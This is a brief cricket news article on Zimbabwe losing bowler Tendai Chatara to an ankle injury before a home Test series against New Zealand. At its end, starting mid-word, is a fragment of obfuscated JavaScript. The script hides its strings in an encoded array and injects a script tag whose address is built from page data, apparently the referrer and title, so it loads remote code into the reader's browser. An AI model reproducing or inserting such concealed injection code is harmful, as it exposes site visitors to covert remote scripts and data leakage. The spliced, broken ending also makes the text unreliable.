Zimbabwe faces a huge blow ahead of the test series against New Zealand, as they lose their ace bowler Tendai Chatara to an ankle injury.

Chatara has been ruled out of the upcoming test series due to an ankle injury that he sustained while bowling for Zimbabwe A on the first day of their three-day match against the Kiwias in Harare. The visitors had a comfortable 259-run win against the home side on Sunday.

The 25-year-old was part of the front line bowling attack of Zimbabwe for the test series starting on Thursday. Chatara, who had also fractured his leg a year ago, will be replaced by Michael Chinouya, 30, who is an amateur in the international circuit with only two one-day internationals to his name.

An injury was the last thing the home side would have wanted as they have already lost their seamer Tinashe Panyangara, who failed to recover from a back problem just before the series.

The test series against New Zealand will be the first test series for Zimbabwe in over 20 months. Both the test matches are to be played at the Queens Sports Club in Harare, with the first test match starting on July 28, and the second on August 6. ent;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
